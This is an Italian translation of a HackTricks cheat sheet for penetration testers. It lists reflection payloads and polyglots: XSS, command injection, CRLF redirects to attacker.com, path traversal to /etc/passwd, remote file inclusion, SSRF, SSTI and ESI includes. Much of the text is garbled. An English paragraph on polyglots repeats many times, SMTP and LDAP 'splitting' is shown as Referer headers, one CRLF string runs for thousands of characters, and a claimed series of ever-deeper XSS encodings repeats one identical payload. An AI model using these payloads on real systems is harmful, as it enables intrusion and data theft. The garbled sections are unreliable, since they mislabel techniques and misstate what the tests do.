.. | ||
README.md | ||
web-vulns-list.md |
Tecniche di riflessione - CheatSheet di PoCs e Poliglotti
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata in HackTricks o scaricare HackTricks in PDF Controlla i PACCHETTI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di NFT esclusivi
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR a HackTricks e HackTricks Cloud github repos.
Lo scopo di queste PoC e Poliglotti è fornire al tester un riassunto rapido delle vulnerabilità che può sfruttare se il suo input viene in qualche modo riflessa nella risposta.
{% hint style="warning" %} Questa cheatsheet non propone un elenco esaustivo di test per ogni vulnerabilità, solo alcuni di base. Se stai cercando test più completi, accedi a ciascuna vulnerabilità proposta. {% endhint %}
{% hint style="danger" %} Non troverai iniezioni dipendenti dal Content-Type come XXE, poiché di solito le proverai tu stesso se trovi una richiesta che invia dati xml. Qui non troverai nemmeno iniezioni di database poiché, anche se alcuni contenuti potrebbero essere riflessi, dipende molto dalla tecnologia e dalla struttura del backend del database. {% endhint %}
Elenco di Poliglotti
{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
Iniezione di Template Lato Client
Test di base
{{7*7}}
[7*7]
Poliglotti
Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:
-
HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.
-
PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code when opened in a PDF reader, potentially exploiting vulnerabilities in the reader software.
-
Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript. They can be used to execute JavaScript code when opened in an image viewer, bypassing any security measures that may be in place for image files.
-
ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when extracted, potentially exploiting vulnerabilities in the ZIP extraction software.
-
XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript. They can be used to execute JavaScript code when opened in an XML parser, potentially exploiting vulnerabilities in the parser software.
-
CSV/JavaScript Polyglots: These files can be interpreted as both CSV (Comma-Separated Values) and JavaScript. They can be used to execute JavaScript code when opened in a spreadsheet program, bypassing any security measures that may be in place for CSV files.
Polyglots can be created by carefully crafting the file structure and taking advantage of the different parsing rules for each file type. They can be used in various hacking scenarios, such as bypassing security filters, delivering malware, or executing arbitrary code.
{{7*7}}[7*7]
Injection di Comandi
Test di Base
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)
Poliglotti
Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:
-
HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.
-
PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code when opened in a PDF reader, potentially exploiting vulnerabilities in the reader software.
-
Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript. They can be used to execute JavaScript code when opened in an image viewer, potentially exploiting vulnerabilities in the viewer software.
-
ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when extracted, potentially exploiting vulnerabilities in the extraction software.
-
XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript. They can be used to execute JavaScript code when opened in an XML parser, potentially exploiting vulnerabilities in the parser software.
Polyglots can be created by carefully crafting the file structure and taking advantage of the similarities between different file formats. They require a deep understanding of the file formats involved and can be challenging to create. However, they can be powerful tools for bypassing security measures and executing malicious code.
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
CRLF
Test di base
HTTP Response Splitting
CRLF Injection
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0ASet-Cookie:%20test=test
HTTP Response Splitting - Location Header
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0ALocation:%20http://malicious.com
HTTP Response Splitting - Set-Cookie Header
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0ASet-Cookie:%20test=test
SMTP Response Splitting
CRLF Injection
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0AMAIL%20FROM:%20<test@example.com>
SMTP Response Splitting - MAIL FROM
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0AMAIL%20FROM:%20<test@example.com>
SMTP Response Splitting - RCPT TO
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0ARCPT%20TO:%20<test@example.com>
SMTP Response Splitting - DATA
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0ADATA
SMTP Response Splitting - Subject
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0ASubject:%20Test
SMTP Response Splitting - Content-Type
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3Ch1%3ETest%3C/h1%3E%3C/body%3E%3C/html%3E
LDAP Response Splitting
CRLF Injection
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0
```bash
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
Markup Sospeso
Test di Base
<!-- HTML Comment -->
<!-- Commento HTML -->
<!-- HTML Comment with dangling markup -->
<!-- Commento HTML con markup sospeso -->
<!-- HTML Comment with dangling markup and unclosed tag -->
<!-- Commento HTML con markup sospeso e tag non chiuso -->
<!-- HTML Comment with dangling markup and unclosed tag and attribute -->
<!-- Commento HTML con markup sospeso, tag non chiuso e attributo -->
<!-- HTML Comment with dangling markup and unclosed tag and attribute and value -->
<!-- Commento HTML con markup sospeso, tag non chiuso, attributo e valore -->
<!-- HTML Comment with dangling markup and unclosed tag and attribute and value and quotation mark -->
<!-- Commento HTML con markup sospeso, tag non chiuso, attributo, valore e virgolette -->
<!-- HTML Comment with dangling markup and unclosed tag and attribute and value and quotation mark and equal sign -->
<!-- Commento HTML con markup sospeso, tag non chiuso, attributo, valore, virgolette e segno di uguale -->
<!-- HTML Comment with dangling markup and unclosed tag and attribute and value and quotation mark and equal sign and space -->
<!-- Commento HTML con markup sospeso, tag non chiuso, attributo, valore, virgolette, segno di uguale e spazio -->
<!-- HTML Comment with dangling markup and unclosed tag and attribute and value and quotation mark and equal sign and space and closing tag -->
<!-- Commento HTML con markup sospeso, tag non chiuso, attributo, valore, virgolette, segno di uguale, spazio e tag di chiusura -->
[//]: # (Markdown Comment)
[//]: # (Commento Markdown)
[//]: # (Markdown Comment with dangling markup)
[//]: # (Commento Markdown con markup sospeso)
[//]: # (Markdown Comment with dangling markup and unclosed tag)
[//]: # (Commento Markdown con markup sospeso e tag non chiuso)
[//]: # (Markdown Comment with dangling markup and unclosed tag and attribute)
[//]: # (Commento Markdown con markup sospeso, tag non chiuso e attributo)
[//]: # (Markdown Comment with dangling markup and unclosed tag and attribute and value)
[//]: # (Commento Markdown con markup sospeso, tag non chiuso, attributo e valore)
[//]: # (Markdown Comment with dangling markup and unclosed tag and attribute and value and quotation mark)
[//]: # (Commento Markdown con markup sospeso, tag non chiuso, attributo, valore e virgolette)
[//]: # (Markdown Comment with dangling markup and unclosed tag and attribute and value and quotation mark and equal sign)
[//]: # (Commento Markdown con markup sospeso, tag non chiuso, attributo, valore, virgolette e segno di uguale)
[//]: # (Markdown Comment with dangling markup and unclosed tag and attribute and value and quotation mark and equal sign and space)
[//]: # (Commento Markdown con markup sospeso, tag non chiuso, attributo, valore, virgolette, segno di uguale e spazio)
[//]: # (Markdown Comment with dangling markup and unclosed tag and attribute and value and quotation mark and equal sign and space and closing tag)
[//]: # (Commento Markdown con markup sospeso, tag non chiuso, attributo, valore, virgolette, segno di uguale, spazio e tag di chiusura)
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
Inclusione di file/Traversamento di percorsi
Test di base
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
Reindirizzamento aperto / Server Side Request Forgery
Test di base
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
ReDoS
Test di base
<details>
<summary>Test 1</summary>
```javascript
/^([a-z])+$/i.test('a'.repeat(10**6))
Test 2
/^([a-z])+$/i.test('a'.repeat(10**7))
Test 3
/^([a-z])+$/i.test('a'.repeat(10**8))
Test avanzati
<details>
<summary>Test 1</summary>
```javascript
/^([a-z])+$/i.test('a'.repeat(10**9))
Test 2
/^([a-z])+$/i.test('a'.repeat(10**10))
Test 3
/^([a-z])+$/i.test('a'.repeat(10**11))
Test di base
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Poliglotti
Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:
-
HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.
-
PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code when opened in a PDF reader, potentially exploiting vulnerabilities in the reader software.
-
Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript. They can be used to execute JavaScript code when opened in an image viewer, bypassing any security measures that may be in place for image files.
-
ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when extracted, potentially exploiting vulnerabilities in the ZIP extraction software.
-
XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript. They can be used to execute JavaScript code when opened in an XML parser, potentially exploiting vulnerabilities in the parser software.
Polyglots can be created by carefully crafting the file structure and taking advantage of the different ways that file types are interpreted by different software. They can be used in various hacking scenarios, such as bypassing security filters, delivering malware, or executing arbitrary code.
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Server Side Request Forgery
Gli stessi test utilizzati per l'Open Redirect possono essere utilizzati qui.
Server Side Template Injection
Test di base
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
Poliglotti
Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:
-
HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.
-
PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code when opened in a PDF reader, potentially exploiting vulnerabilities in the reader software.
-
Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript. They can be used to execute JavaScript code when opened in an image viewer, bypassing any security measures that may be in place for image files.
-
ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when extracted, potentially exploiting vulnerabilities in the ZIP extraction software.
-
Polyglot Shell Scripts: These files can be interpreted as both shell scripts and other file types, such as image files or PDFs. They can be used to execute arbitrary commands on a system when executed as a shell script.
Polyglots can be created by carefully crafting the file structure and content to conform to the specifications of multiple file types. This requires a deep understanding of the file formats involved and can be a complex process. However, once created, polyglots can be powerful tools for bypassing security measures and executing malicious code.
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
Iniezione lato server XSLT
Test di base
<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
Poliglotti
Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:
-
HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.
-
Image/Script Polyglots: These files can be interpreted as both images and scripts. They can be used to embed malicious code within an image file, allowing it to be executed when the image is opened.
-
PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code within a PDF document, potentially exploiting vulnerabilities in PDF readers.
-
ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when the ZIP archive is opened, bypassing any security measures that may be in place.
-
Polyglot Shell Scripts: These files can be interpreted as both shell scripts and other file types, such as images or documents. They can be used to execute arbitrary commands on a target system, potentially leading to remote code execution.
Polyglots can be created by carefully crafting the file structure and taking advantage of the way different file types are parsed by different applications. They can be used in various hacking scenarios, such as bypassing security filters, delivering malware, or exploiting vulnerabilities.
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
XSS
Test di base
Test di base
<script>alert('XSS')</script>
Test di base con tag HTML
<IMG SRC="javascript:alert('XSS');">
Test di base con tag HTML e evento
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in maiuscolo
<IMG SRC=JaVaScRiPt:alert('XSS')>
Test di base con tag HTML e evento in minuscolo
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali e spazi
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi e codifica HTML
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML e codifica URL
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL e codifica URL doppia
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia e codifica URL tripla
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla e codifica URL quadrupla
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla, codifica URL quadrupla e codifica URL quintupla
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla, codifica URL quadrupla, codifica URL quintupla e codifica URL sestupla
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla, codifica URL quadrupla, codifica URL quintupla, codifica URL sestupla e codifica URL settupla
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla, codifica URL quadrupla, codifica URL quintupla, codifica URL sestupla, codifica URL settupla e codifica URL ottupla
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla, codifica URL quadrupla, codifica URL quintupla, codifica URL sestupla, codifica URL settupla, codifica URL ottupla e codifica URL nonupla
<IMG SRC=javascript:alert('XSS')>
Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla, codifica URL quadrupla, codifica URL quintupla, codifica URL sestupla, codifica URL settupla, codifica URL ottupla, codifica URL nonupla e codifica URL decupla
<IMG SRC=javascript:alert('XSS')>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
Poliglotti
Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:
-
HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.
-
PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code when opened in a PDF reader, potentially exploiting vulnerabilities in the reader software.
-
Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript. They can be used to execute JavaScript code when opened in an image viewer, bypassing any security measures that may be in place for image files.
-
ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when extracted, potentially exploiting vulnerabilities in the ZIP extraction software.
-
XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript. They can be used to execute JavaScript code when opened in an XML parser, potentially exploiting vulnerabilities in the parser software.
Polyglots can be created by carefully crafting the file structure and taking advantage of the different ways that file types are interpreted by different software. They can be used in various hacking scenarios, such as bypassing security filters, delivering malware, or executing arbitrary code.
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
